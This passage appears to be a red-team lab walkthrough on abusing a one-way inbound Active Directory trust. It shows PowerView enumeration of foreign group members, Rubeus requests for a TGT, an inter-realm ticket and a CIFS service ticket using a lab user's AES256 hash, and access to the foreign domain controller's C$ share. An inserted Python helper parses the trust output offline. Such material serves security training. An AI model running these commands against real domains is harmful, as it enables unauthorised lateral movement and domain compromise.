One-Way Inbound
dev.cyberbotic.io also has a one-way inbound trust with dev-studio.com.
beacon> powershell Get-DomainTrust
SourceName : dev.cyberbotic.io
TargetName : dev-studio.com
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection : Inbound
WhenCreated : 8/16/2022 9:52:37 AM
WhenChanged : 8/16/2022 9:52:37 AM
Because the trust is inbound from our perspective, dev-studio.com trusts dev.cyberbotic.io: principals from our domain can be added to groups and ACLs in the foreign domain, but not the other way round. The trust also lets us enumerate the foreign domain from where we are.
beacon> powershell Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName
dnshostname
-----------
dc.dev-studio.com
Get-DomainForeignGroupMember enumerates groups in the queried domain that contain members from outside that domain, and returns those members.
beacon> powershell Get-DomainForeignGroupMember -Domain dev-studio.com
GroupDomain : dev-studio.com
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=dev-studio,DC=com
MemberDomain : dev-studio.com
MemberName : S-1-5-21-569305411-121244042-2357301523-1120
MemberDistinguishedName : CN=S-1-5-21-569305411-121244042-2357301523-1120,CN=ForeignSecurityPrincipals,DC=dev-studio,DC=com
This output shows that the domain's built-in Administrators group has a member who is not part of dev-studio.com. Foreign members are stored as ForeignSecurityPrincipal objects, so the MemberName field holds a raw SID rather than a name. Its domain-SID prefix belongs to our domain, so it can be resolved from our side of the trust.
beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120
DEV\Studio Admins
This means that members of DEV\Studio Admins are also members of the built-in Administrators group of dev-studio.com and therefore inherit local admin access to dc.dev-studio.com. If this is confusing, this is how it looks from the perspective of the foreign domain controller.
[Screenshot not reproduced: the Administrators group on the foreign domain controller, with the DEV\Studio Admins foreign security principal listed as a member.]
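The enumeration above comes down to three mechanical steps: reading the trust's direction and attribute bits, parsing the records PowerView prints, and mapping a ForeignSecurityPrincipal SID back to a domain and a name by its domain-SID prefix (which is what ConvertFrom-SID does through LSA). The Python below is an added example, not code from this page or from PowerView, that performs those steps offline over a copy of the output shown above. It also predicts, from the trust object's msDS-SupportedEncryptionTypes bits, whether the inter-realm ticket will come back as RC4 or AES. The DEV domain SID is taken from the SID resolved above; the RID-to-name table, the flag tables, and the assumption that the trust object has no AES flag set are the example's own.

```python
"""
Added example (not the page's own code): decode a trust as stored on our side,
parse PowerView-style output, and resolve ForeignSecurityPrincipal SIDs offline.
All sample data below is constructed from the records shown on this page.
"""
from __future__ import annotations

# trustDirection on the trustedDomain object (TDO) in OUR domain, from OUR perspective.
TRUST_DIRECTION = {0: "Disabled", 1: "Inbound", 2: "Outbound", 3: "Bidirectional"}
# trustAttributes bit flags.
TRUST_ATTRIBUTES = {0x1: "NON_TRANSITIVE", 0x2: "UPLEVEL_ONLY", 0x4: "QUARANTINED_DOMAIN",
                    0x8: "FOREST_TRANSITIVE", 0x10: "CROSS_ORGANIZATION", 0x20: "WITHIN_FOREST",
                    0x40: "TREAT_AS_EXTERNAL", 0x80: "USES_RC4_ENCRYPTION"}
# msDS-SupportedEncryptionTypes bit flags (same encoding as on user/computer objects).
ETYPE_BITS = {0x1: "DES_CBC_CRC", 0x2: "DES_CBC_MD5", 0x4: "RC4_HMAC",
              0x8: "AES128_CTS_HMAC_SHA1", 0x10: "AES256_CTS_HMAC_SHA1"}


def decode_trust(direction: int, attributes: int, supported_etypes: int = 0) -> dict:
    """Explain what a trust grants and predict the etype of the referral (inter-realm) TGT."""
    etypes = [name for bit, name in ETYPE_BITS.items() if supported_etypes & bit]
    aes = any(name.startswith("AES") for name in etypes)
    # Inbound  = the foreign domain trusts us: OUR principals can be granted access THERE.
    # Outbound = we trust the foreign domain: THEIR principals can be granted access HERE.
    grants = {0: "none", 1: "our principals -> foreign resources",
              2: "foreign principals -> our resources", 3: "both ways"}
    return {
        "direction": TRUST_DIRECTION.get(direction, f"Unknown({direction})"),
        "grants": grants.get(direction, "unknown"),
        "attributes": [name for bit, name in TRUST_ATTRIBUTES.items() if attributes & bit],
        "sid_filtering": bool(attributes & 0x4),  # QUARANTINED_DOMAIN
        "trust_supports_aes": aes,
        # Without an AES flag on the trust object the referral TGT is rc4_hmac (as seen on this page).
        "expected_referral_etype": "aes" if aes else "rc4_hmac",
    }


def parse_records(text: str) -> list[dict[str, str]]:
    """Parse PowerView-style 'Key : Value' blocks separated by blank lines."""
    records: list[dict[str, str]] = []
    current: dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")  # first colon ends the key; values may contain colons
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def resolve_sid(sid: str, domain_sids: dict[str, str], names: dict[tuple[str, int], str]) -> str | None:
    """Return 'NETBIOS\\Name' when the SID's domain prefix is one of ours, else None."""
    prefix, _, rid = sid.rpartition("-")
    for netbios, domain_sid in domain_sids.items():
        if prefix == domain_sid and rid.isdigit():
            name = names.get((netbios, int(rid)), f"RID {rid}")
            return f"{netbios}\\{name}"
    return None  # foreign to every domain we know: leave it as a raw SID


def foreign_admins(foreign_member_output: str, domain_sids: dict[str, str],
                   names: dict[tuple[str, int], str]) -> list[tuple[str, str]]:
    """Pair each foreign group with the resolved identity of its out-of-domain member."""
    result = []
    for rec in parse_records(foreign_member_output):
        resolved = resolve_sid(rec["MemberName"], domain_sids, names) or rec["MemberName"]
        result.append((f"{rec['GroupDomain']}\\{rec['GroupName']}", resolved))
    return result


# Constructed sample data. The DEV domain SID is the prefix of the SID resolved on this page;
# the RID table stands in for the LSA lookup ConvertFrom-SID performs.
DOMAIN_SIDS = {"DEV": "S-1-5-21-569305411-121244042-2357301523"}
NAMES = {("DEV", 1120): "Studio Admins"}
FOREIGN_MEMBERS = """GroupDomain : dev-studio.com
GroupName : Administrators
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=dev-studio,DC=com
MemberDomain : dev-studio.com
MemberName : S-1-5-21-569305411-121244042-2357301523-1120
MemberDistinguishedName : CN=S-1-5-21-569305411-121244042-2357301523-1120,CN=ForeignSecurityPrincipals,DC=dev-studio,DC=com
"""

if __name__ == "__main__":
    # The page's trust: trustDirection 1 (Inbound), no attributes, no AES flag assumed on the TDO.
    print(decode_trust(direction=1, attributes=0))
    print(foreign_admins(FOREIGN_MEMBERS, DOMAIN_SIDS, NAMES))
```

decode_trust() is written from the perspective of the domain that holds the TDO, so the same trust read from dev-studio.com's side would report Outbound; that symmetry is why "inbound from our perspective" still means our principals are the ones with access over there.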
To hop this trust, we only need to impersonate a member of this Studio Admins domain group.
beacon> powershell Get-DomainGroupMember -Identity "Studio Admins" | select MemberName
MemberName
----------
nlamb
To hop a domain trust using Kerberos, we first need an inter-realm ticket: a referral TGT for the foreign realm, issued by our own KDC and encrypted with the key shared across the trust. Start by obtaining a normal TGT for the target user (here with asktgt and their AES256 hash).
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFwj[...]MuaW8=
Next, use that TGT to ask our domain controller for the referral ticket to the target domain. The service name is krbtgt/dev-studio.com, which is what tells the KDC we want an inter-realm ticket rather than a ticket for a local service.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'krbtgt/dev-studio.com'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFoz[...]NPTQ==
ServiceName : krbtgt/DEV-STUDIO.COM
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/12/2022 11:13:23 AM
EndTime : 9/12/2022 9:11:21 PM
RenewTill : 9/19/2022 11:11:21 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : zfUbwA2B0+aqao7HSvnUgw==
Notice that this inter-realm ticket is of type rc4_hmac even though our TGT was aes256_cts_hmac_sha1. That is the default for a trust unless AES has been explicitly enabled on it (the "other domain supports Kerberos AES Encryption" option on the trust, which sets msDS-SupportedEncryptionTypes on the trust object), so an RC4 referral is not in itself bad OPSEC.
Finally, use this inter-realm ticket to request service tickets from the target domain's DC. Here, I'm requesting a ticket for CIFS on dc.dev-studio.com.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/dc.dev-studio.com'
[*] Using domain controller: dc.dev-studio.com (10.10.150.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):
doIFkD[...]8uY29t
ServiceName : cifs/dc.dev-studio.com
ServiceRealm : DEV-STUDIO.COM
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/12/2022 11:16:46 AM
EndTime : 9/12/2022 9:11:21 PM
RenewTill : 9/19/2022 11:11:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : V1vCRoRX/9SAFe/ynWQIE9E9DYztP0mk6bg9BRx9Wjk=
The CIFS ticket still has to be imported into the current logon session (for example with Rubeus's /ptt option on asktgs, or with the ptt action against a sacrificial logon session) before it can be used. Once it is, klist shows it cached and the share is accessible.
beacon> run klist
Current LogonId is 0:0x45bcb0
Cached Tickets: (1)
#0> Client: nlamb @ DEV.CYBERBOTIC.IO
Server: cifs/dc.dev-studio.com @ DEV-STUDIO.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
beacon> ls \\dc.dev-studio.com\c$
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/16/2022 09:15:48 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 05/08/2021 08:20:24 PerfLogs
dir 08/19/2021 06:35:15 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 08/16/2022 09:26:24 ProgramData
dir 08/16/2022 08:54:23 Recovery
dir 08/16/2022 09:26:41 System Volume Information
dir 08/16/2022 08:55:34 Users
dir 08/16/2022 09:23:25 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 09/12/2022 08:36:05 DumpStack.log.tmp
384mb fil 09/12/2022 08:36:05 pagefile.sys